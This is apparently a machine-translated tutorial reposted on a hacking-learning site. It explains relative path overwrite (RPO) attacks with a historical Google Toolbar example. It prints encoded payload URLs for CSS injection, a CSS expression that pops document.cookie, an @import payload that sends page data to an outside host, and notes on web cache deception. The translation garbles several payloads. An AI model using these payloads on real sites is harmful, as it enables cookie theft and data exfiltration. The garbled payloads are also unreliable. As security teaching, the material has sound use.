Hacking Book | Free Online Hacking Learning


a new type of web attack technology: rpo attack

Posted by chiappelli at 2020-03-06


Attack and defense competition Threat Intelligence Security Service

RPO (relative path overwrite) attack, also known as relative path overwrite attack, depends on the response of browser and network server, and takes advantage of Web caching technology and configuration differences of server.

Author: Li Yuhan

From: Anyun Technology

The example in this article uses CSS to attack,

It is equivalent to using CSS of relative path in the page to cheat,

Let the browser write XSS code into the page.

1、 Initial understanding of RPO attack



Web page code



<title>Google Toolbar API -Guide to Making Custom Buttons</title>

<link href="../../styles.css" rel="stylesheet"type="text/css"/>



JSP accepts path parameters and all semicolons as parameters such as path; / notpath will also be accepted as a directory

The browser will encode and decode the URL submitted by the user and send it to the server

If you can use% 2F instead of "/"

You can write the URL as http://www.google.com/tools/toolbar/buttons/apis% 2fhowto

Return right

The server received / tools / toolbar / buttons / APIs / howto? Guide.html

The browser received / tools / toolbar / buttons / APIs% 2fhowto? Guide.html

The style sheet imported in the page is / tools / toolbar / buttons /.. / style.css

The browser thinks that the root directory of style.css is tools / toolbar / buttons, not tools / toolbar / button / APIs

So.. / style.css jumps to a higher level directory

There's more room to use

If we fake a directory as fake, we can import a nonexistent tool / fake / styles.css


The directory the server receives is / tools / make /.. / toolbar / buttons / APIs / howto  guide.html

The directory received by the browser is / tools / fake /...% 2ftoolbar / buttons / APIs% 2fhowto? Guide.html

The imported style sheet is / tools / make /...% 2ftoolbar / buttons /.. / style.css

The browser thinks that fake / and% 2ftoolbar are two different directories

In this way, you can import any stylesheet under Google domain name

Find a page that can import background with parameters

For example: http://www.google.com/gadgets/directory? Synd = toolbar & frontpage = 1 & Q =% 0A {} * {background: Red}

The source code of the web page is: < div id = "frontend directory page" >

<font size="-1"><divclass="resultNotFound"><p>Search <b>-

{}*{background:red}</b> did not match any gadgets

If http://www.google.com/tools/toolbar/buttons/gallery? Foo = bar is automatically redirected to


So we can construct the load directly

Write XSS code to the URL because the stylesheet requires continuous injection

The payload constructed is http://www.google.com/tools/toolbar% 2fbuttons% 3fq% 3D% 250A% 257b% 257d% 257bbackground% 253ared% 257d /...% 2F / APIs / howto_guide.html

The request received by the server is / tools / toolbar / buttons / gallery? Q =% 0A {} * {background: Red} /.. / APIs / howto {guide.html

The request received by the browser is / tools / toolbar% 2fbuttons% 3fq% 3D% 250A% 257b% 257d% 257bbackground% 253ared% 257d /...% 2F / APIs / howto  guide.html

The imported style sheet is / tools / toolbar% 2fbuttons% 3fq% 3D% 250A% 257b% 257d% 257bbackground% 253ared% 257d /...% 2F / APIs /.. / style.css



Stylesheet successfully imported into page

Further, you can import CSS XSS code into it, such as {XSS: Interpretation (alert (document. Cookie))}


Pop up document.cookie.

Google has set the deep defense setting request: x-content-type-options: nosniff will not insert the properties in the Google Toolbar custom add key into the stylesheet, but IE9 can recognize this request later

This header request was not recognized before IE8

Other browsers such as Firefox and chrome ignore this header request when reading data from the same domain

2、 Further utilization

CSS takes a loose parsing approach to all imported stylesheets

All pages under http://www.google.com/ * can be imported for parsing as style sheets

If the page includes privacy data and injection points, we can use CSS magic to steal them

Conditions of use: 1. The injection point should be before the privacy data

2. White space characters such as% 0A,% 0C,% 0d are allowed at the injection point

3. Privacy data does not include interval

PayLoad:http://www.google.com/search?nord=1&q={}%[email protected]"//innerht.ml?

@Import is an infrequent method, which is easy to be ignored by front-end development. Used to import CSS files. Import precedes other CSS rules except @ charset. So using @ import to introduce CSS can bypass Google's defense in depth.

An import rule of @ import "/ / innerht.ml was created in our payload

Get the information leaked from the page

Then use to get


3、 External transmission:

Web server spoofing request:

When there is a load server on the target website,

When visiting static files such as CSS that do not exist in fact on the current page, there will be a static file page with user account password in the cache server, so that attackers can directly access the user account.

List of file suffixes available for caching:

aif,aiff,au,avi,bin,bmp,cab,carb,cct,cdf,class,css,doc,dcr,dtd,gcf,gff,gif,grv,hdml,hqx,ico,ini,jpeg,jpg, js,mov,mp3,nc,pct,ppc,pws,swa,swf,txt,vbs,w32,wav,wbmp,wml,wmlc,wmls,wmlsc,xsd,zip